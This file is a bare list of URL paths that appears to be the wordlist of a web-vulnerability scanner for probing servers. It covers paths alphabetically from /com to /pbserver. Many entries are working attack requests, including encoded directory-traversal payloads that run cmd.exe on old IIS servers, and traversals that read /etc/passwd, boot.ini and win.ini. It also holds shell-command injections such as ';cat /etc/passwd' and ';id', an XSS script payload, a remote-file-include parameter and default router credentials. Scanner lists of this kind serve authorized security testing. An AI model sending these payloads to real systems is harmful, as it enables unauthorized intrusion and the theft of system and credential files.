/com/novell/webpublisher/help/en/default.htm
/com1
/com2
/com3
/com3
/comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview
/comments/browse.php?fid=2&tid=4&go=&lt
/common/browser.inc
/con
/con/con
/config/
/config/check.txt
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/conspass.chl+
/consport.chl+
/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
/content/base/build/explorer/none.php?/etc/passwd
/contents.php?new_language=elvish&mode=select
/contents/extensions/asp/1
/counter/
/counter/1/n/n/0/3/5/0/a/123.gif
/cowsconf/config.asc
/cpa.nsf
/cpanel/
/cplogfile.log
/cpqlogin.htm
/credit/
/custdata/
/customer/
/customerdata.nsf
/customers/
/d/inetpub/scripts/root.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/da.nsf
/dan_o.dat
/dat/
/data/
/data/member_log.txt
/data/userlog/log.txt
/database.nsf
/database.nsf/
/database/
/database/metacart.mdb
/databases/
/db.nsf
/db/
/dba4.nsf
/dbase/
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/dclf.nsf
/dcshop/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/decsadm.nsf
/decsdoc.nsf
/decslog.nsf
/default.asp
/default.asp.
/default.asp. HTTP/1.0
/default.asp::$DATA
/default.asp\\
/default.nsf
/demo/ojspext/events/globals.jsa
/demo/sql/index.jsp
/deny/
/dev/
/devel/
/development/
/dirassist.nsf
/directory.php?dir=%3Bcat%20/etc/passwd
/directory.php?dir=%3Bmore%20/etc/passwd
/dms0
/doc
/doc-html/
/doc/
/doc/domguide.nsf
/doc/dspug.nsf
/doc/help4.nsf
/doc/helpadmin.nsf
/doc/helplt4.nsf
/doc/internet.nsf
/doc/javapg.nsf
/doc/lccon.nsf
/doc/migrate.nsf
/doc/npn_admn.nsf
/doc/npn_rn.nsf
/doc/packages
/doc/packages/
/doc/readmec.nsf
/doc/readmes.nsf
/doc/smhelp.nsf
/doc/srvinst.nsf
/docs/
/docs/sdb/en/html/index.html
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/document/
/documents/
/doladmin.nsf
/dols_help.nsf
/domadmin.nsf
/domcfg.nsf
/domcfg.nsf/?open
/domguide.nsf
/domlog.nsf
/dostuff.php?action=modify_user
/down/
/download.php?op=viewdownload
/download.php?sortby=&dcategory=
/download/
/downloads/
/downloads/pafiledb.php?action=download&id=4?\
/downloads/pafiledb.php?action=email&id=4?\
/downloads/pafiledb.php?action=rate&id=4?\
/dspug.nsf
/easylog/easylog.html
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20
/employees/
/enter_bug.cgi
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/error/500error.jsp?et=1
/error/HTTP_NOT_FOUND.html.var
/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/etc/passwd
/event.nsf
/events.nsf
/events4.nsf
/events5.nsf
/ews/ews/architext_query.pl
/ex/jsp/simple.jsp.
/example/
/examples/
/examples/applications/bboard/bboard_frames.html
/examples/basic/servlet/HelloServlet
/examples/jsp/index.html
/examples/jsp/num/numguess.js%70
/examples/jsp/snp/anything.snp
/examples/jsp/snp/snoop.jsp
/examples/jsp/source.jsp??
/examples/servlet/AUX
/examples/servlet/TroubleShooter
/examples/servlets/index.html
/exchange/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/exchange/lib/AMPROPS.INC
/exchange/lib/ATTACH.INC
/exchange/lib/DELETE.INC
/exchange/lib/GETREND.INC
/exchange/lib/GETWHEN.INC
/exchange/lib/JSATTACH.INC
/exchange/lib/JSROOT.INC
/exchange/lib/JSUTIL.INC
/exchange/lib/LANG.INC
/exchange/lib/PAGEUTIL.INC
/exchange/lib/PUBFLD.INC
/exchange/lib/RENDER.INC
/exchange/lib/SESSION.INC
/exchange/lib/logon.inc
/exchange/root.asp?acs=anon
/exe/
/exec/show/config/cr
/exploits/
/ext.dll
/ext.ini.% 00.txt
/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
/fcgi-bin/echo.exe?foo=
/fcgi-bin/echo2.exe?foo=
/file-that-is-not-real-2002.php3
/file/
/file/../../../../../../../../etc/
/file/index.jsp
/filemanager/filemanager_forms.php
/files/
/foldoc/template.cgi
/foldoc/template.cgi?template.cgi
/forum/
/forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/forum/common.php
/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\
/forum/viewtopic.php
/forums/browse.php?fid=3&tid=46&go=
/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD
/fpadmin/
/fpdb/shop.mdb
/friend.php?op=SiteSent&fname=
/ftp.pl?dir=../../../../../../
/ftp/
/gb/index.php?login=true
/general.chl+
/getFile.cfm
/getaccess
/getdrvrs.exe
/girl/
/girls/
/global.asa
/global.asa+.htr
/global.inc
/globals.jsa
/goform/CheckLogin?login=root&password=tslinux
/group.nsf
/groups.nsf
/guestbook/
/guests/
/help.php?chapter=
/help/
/help/contents.htm
/help/domguide.nsf
/help/dspug.nsf
/help/help4.nsf
/help/helpadmin.nsf
/help/helplt4.nsf
/help/home.html
/help/internet.nsf
/help/javapg.nsf
/help/lccon.nsf
/help/migrate.nsf
/help/npn_admn.nsf
/help/npn_rn.nsf
/help/readmec.nsf
/help/readmes.nsf
/help/smhelp.nsf
/help/srvinst.nsf
/help4.nsf
/help5_admin.nsf
/help5_client.nsf
/help5_designer.nsf
/helpadmin.nsf
/helplt4.nsf
/hidden.nsf
/hidden/
/hire/
/hit_tracker/
/hitmatic/
/hitmatic/analyse.cgi
/hits.txt
/home.php?arsc_language=elvish
/home/
/homejunk.aspx
/homepage.nsf
/hostingcontroller/
/ht_root/wwwroot/-/local/httpd$map.conf
/htdocs/
/html/
/html/?PageServices
/html/cgi-bin/cgicso?query=
/html/cgi-bin/cgicso?query=AAA
/html/snort2html.html
/hyperstat/stat_what.log
/iNotes/Forms5.nsf
/iNotes/Forms5.nsf/$DefaultNav
/ibill/
/icons/
/idea/
/ideas/
/iisadmin
/iisadmin
/iisadmin/
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisamples/Sdk
/iissamples
/iissamples/Default
/iissamples/ExAir
/iissamples/ISSamples
/iissamples/exair/howitworks/Code.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/Winmsdp.exe
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/exair/search/query.asp
/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/exair/search/search.asp
/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/iissamples/query.asp
/iissamples/issamples/SQLQHit.asp
/iissamples/issamples/Winmsdp.exe
/iissamples/issamples/codebrws.asp
/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/iissamples/issamples/sqlqhit.asp
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/iissamples/sdk/asp/docs/Winmsdp.exe
/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/sdk/asp/docs/codebrws.asp
/image/
/images/
/images/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/images/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/images/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/images/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
/images/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/images/..%252e..%252ewinnt/system32/cmd.exe?/c+dir
/images/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/images/..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/images/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/images/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+dir
/images/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir
/images/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/images/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir
/images/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/images/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir
/images/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/images/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir
/images/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/images/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/images/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/images/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/images/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/img-sys/
/img/
/import/
/inc/
/inc/sendmail.inc
/include/
/include/inc/
/includes/
/includes/global.inc
/incoming/
/index.JSP
/index.asp%81
/index.asp::$DATA
/index.html
/index.html%20
/index.html.bak
/index.html.ca
/index.html.cz.iso8859-2
/index.html.de
/index.html.dk
/index.html.ee
/index.html.el
/index.html.en
/index.html.es
/index.html.et
/index.html.fr
/index.html.he.iso8859-8
/index.html.hr.iso8859-2
/index.html.it
/index.html.ja.iso2022-jp
/index.html.kr.iso2022-kr
/index.html.ltz.utf8
/index.html.lu.utf8
/index.html.nl
/index.html.nn
/index.html.no
/index.html.po.iso8859-2
/index.html.pt
/index.html.pt-br
/index.html.ru.cp-1251
/index.html.ru.cp866
/index.html.ru.iso-ru
/index.html.ru.koi8-r
/index.html.ru.utf8
/index.html.se
/index.html.tw
/index.html.tw.Big5
/index.html.var
/index.html~
/index.js%2570
/index.jsp%00x
/index.php.bak
/index.php/123
/index.php3.%5c../..%5cconf/httpd.conf
/index.php3?vhosts[test]=
/index.php3ftable=test
/index.php?action=search&searchFor=\
/index.php?action=storenew&username=
/index.php?catid=&lt
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc
/index.php?file=index.php
/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../boot.ini
/index.php?page=../../../../../../../../../../etc/passwd
/index.php?sql_debug=1
/index.php?|=../../../../../../../../../etc/passwd
/index.php~
/info/
/install/
/instantwebmail/message.php
/interchange/
/internet.nsf
/interscan/
/interscan/cgi-bin/FtpSave.dll?I'm%20Here
/intranet/
/ip.txt
/isapi/tstisapi.dll
/isqlplus
/jamdb/
/java-sys/
/java/
/javadoc/
/javapg.nsf
/javax
/jdbc/
/jigsaw/
/jotter.nsf
/jservdocs/
/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
/jspdocs/
/junk.aspx
/kbccv11.nsf
/kbnv11.nsf
/kbssvv11.nsf
/krysalis/
/l_domlog.nsf
/launch.asp?NFuse_Application=
/launch.jsp?NFuse_Application=
/lccon.nsf
/lcgi/lcgitest.nlm
/lcgi/ndsobj.nlm
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
/lcon.nsf
/ldap.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/level/16/exec/show/config
/level/17/exec/show/config
/level/18/exec/show/config
/level/19/exec/show/config
/level/20/exec/show/config
/level/21/exec/show/config
/level/22/exec/show/config
/level/23/exec/show/config
/level/24/exec/show/config
/level/25/exec/show/config
/level/26/exec/show/config
/level/27/exec/show/config
/level/28/exec/show/config
/level/29/exec/show/config
/level/30/exec/show/config
/level/31/exec/show/config
/level/32/exec/show/config
/level/33/exec/show/config
/level/34/exec/show/config
/level/35/exec/show/config
/level/36/exec/show/config
/level/37/exec/show/config
/level/38/exec/show/config
/level/39/exec/show/config
/level/40/exec/show/config
/level/41/exec/show/config
/level/42/exec/show%20conf
/level/42/exec/show/config
/level/43/exec/show/config
/level/44/exec/show/config
/level/45/exec/show/config
/level/46/exec/show/config
/level/47/exec/show/config
/level/48/exec/show/config
/level/49/exec/show/config
/level/50/exec/show/config
/level/51/exec/show/config
/level/52/exec/show/config
/level/53/exec/show/config
/level/54/exec/show/config
/level/55/exec/show/config
/level/56/exec/show/config
/level/57/exec/show/config
/level/58/exec/show/config
/level/59/exec/show/config
/level/60/exec/show/config
/level/61/exec/show/config
/level/62/exec/show/config
/level/63/exec/show/config
/level/64/exec/show/config
/level/65/exec/show/config
/level/66/exec/show/config
/level/67/exec/show/config
/level/68/exec/show/config
/level/69/exec/show/config
/level/70/exec/show/config
/level/71/exec/show/config
/level/72/exec/show/config
/level/73/exec/show/config
/level/74/exec/show/config
/level/75/exec/show/config
/level/76/exec/show/config
/level/77/exec/show/config
/level/78/exec/show/config
/level/79/exec/show/config
/level/80/exec/show/config
/level/81/exec/show/config
/level/82/exec/show/config
/level/83/exec/show/config
/level/84/exec/show/config
/level/85/exec/show/config
/level/86/exec/show/config
/level/87/exec/show/config
/level/88/exec/show/config
/level/89/exec/show/config
/level/90/exec/show/config
/level/91/exec/show/config
/level/92/exec/show/config
/level/93/exec/show/config
/level/94/exec/show/config
/level/95/exec/show/config
/level/96/exec/show/config
/level/97/exec/show/config
/level/98/exec/show/config
/level/99/exec/show/config
/lib/
/library/
/linux/
/local/httpd$map.conf
/log
/log.htm
/log.html
/log.nsf
/log.txt
/log/
/log4a.nsf
/logfile
/logfile.htm
/logfile.html
/logfile.txt
/logfile/
/logfiles/
/logger.html
/logger/
/logging/
/login.asp%3F+.htr
/login.jsp
/login/
/logs.txt
/logs/
/logs/access_log
/lpt
/lpt9
/lpt9.xtp
/lsxlc.nsf
/mab.nsf
/mail.box
/mail/
/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=&addressemail=junk@example.com
/mail/adminisist.nsf
/mail1.box
/mail10.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mailman/admin/ml-name?\
/mailman/listinfo/
/mailw46.nsf
/main.asp%81
/mall_log_files/order.log
/mambo/administrator/phpinfo.php
/mambo/index.php?Itemid=JUNK(5)
/manage/cgi/cgiproc
/manage/cgi/cgiproc?Nocfile=/system/core
/manage/cgi/cgiproc?Nocfile=/system/filelist.dat
/manage/cgi/cgiproc?Nocfile=/system/keys
/manage/cgi/cgiproc?Nocfile=/system/version.dat
/manager/
/manual.php
/manual/
/manual/ag/esperfrm.htm
/manual/images/
/market/
/marketing/
/mc-icons/
/mcartfree/database/metacart.mdb
/members/
/metacart/database/metacart.mdb
/midicart.mdb
/migrate.nsf
/ministats/admin.cgi
/misc/
/mkstats/
/mlog.phtml
/mod_ose_docs
/modsecurity.php
/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=
/modules.php?name=Downloads&d_op=viewdownload
/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Members_List&sql_debug=1
/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/modules.php?name=Stories_Archive&sa=show_month&year=&month=3&month_l=test
/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=
/modules.php?name=Surveys&pollID=
/modules.php?name=Your_Account&op=userinfo&uname=
/modules.php?op=modload&name=0&file=0
/modules.php?op=modload&name=DMOZGateway&file=index&topic=
/modules.php?op=modload&name=Guestbook&file=index&entry=
/modules.php?op=modload&name=Members_List&file=index&letter=
/modules.php?op=modload&name=News&file=article&sid=
/modules.php?op=modload&name=News&file=index&catid=&topic=
/modules.php?op=modload&name=WebChat&file=index&roomid=
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=
/modules.php?op=modload&name=Wiki&file=index&pagename=
/modules.php?op=modload&name=Xforum&file=&fid=2
/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=
/modules.php?op=modload&name=books&file=index&req=search&query=
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
/mp3/
/mrtg/
/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%5c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/Samples/SELECTOR/showcode.asp
/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
/msadc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/msadc/msadcs.dll
/msadc/root.exe
/msadc/root.exe?/c+dir
/msadc/samples/adctest.asp
/msadc/samples/adctest.asp
/msads/Samples/SELECTOR/showcode.asp
/msdwda.nsf
/mspress30/
/msql/
/mtatbls.nsf
/mtdata/mtstore.nsf
/mtstore.nsf
/myhome.php?action=messages&box=
/mylog.phtml?screen=/etc/passwd
/mysql/
/names.nsf
/nav/cList.php?root=
/ncl_items.html
/ncl_items.html?SUBJECT=2097
/ncl_items.shtml?SUBJECT=1
/neowebscript/test/senvironment.nhtml
/neowebscript/tests/load_webenv.nhtml
/neowebscript/tests/mailtest.nhtml
/netbasic/websinfo.bas
/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
/nethome/
/new/
/newuser?Image=../../database/rbsserv.mdb
/nntp/nd000000.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/nntp/nd000004.nsf
/nntppost.nsf
/nofile              
/nofile.pl
/notes.nsf
/npn_admn.nsf
/npn_rn.nsf
/ns-icons/
/nsn/..%5Cutil/dir.bas
/nsn/..%5Cutil/dsbrowse.bas
/nsn/..%5Cutil/slist.bas
/nsn/env.bas
/nsn/fdir.bas
/nsn/fdir.bas:ShowVolume
/ntsync4.nsf
/ntsync45.nsf
/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/nul..cfm
/nul..dbm
/nul.cfm
/nul.dbm
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<SCRIPT>alert(document.domain)</SCRIPT>"
/number/
/oc/Search/SQLQHit.asp
/oc/Search/sqlqhit.asp
/odbc/
/oekaki/
/officescan/cgi/jdkRqNotify.exe
/officescan/hotdownload/ofscan.ini
/ojspdemos/basic/hellouser/hellouser.jsp
/ojspdemos/basic/simple/usebean.jsp
/ojspdemos/basic/simple/welcomeuser.jsp
/old/
/open?
/opendir.php?/etc/passwd
/opendir.php?requesturl=/etc/passwd
/oprocmgr-status
/options.php?optpage=
/oracle/
/order/
/order/order_log.dat
/order/order_log_v12.dat
/orders/
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order_log.dat
/orders/order_log_v12.dat
/orders/orders.log
/orders/orders.txt
/outgoing/
/owa_util%2esignature
/ows-bin/oaskill.exe?abcde.exe
/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
/ows-bin/perlidlc.bat?&dir
/page.cfm
/page.cgi?../../../../../../../../../../etc/passwd
/pages/
/pages/htmlos/
/passwd
/passwd.adjunct
/passwd.txt
/password
/passwords.txt
/passwords/
/pbserver/
/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/pbserver/pbserver.dll
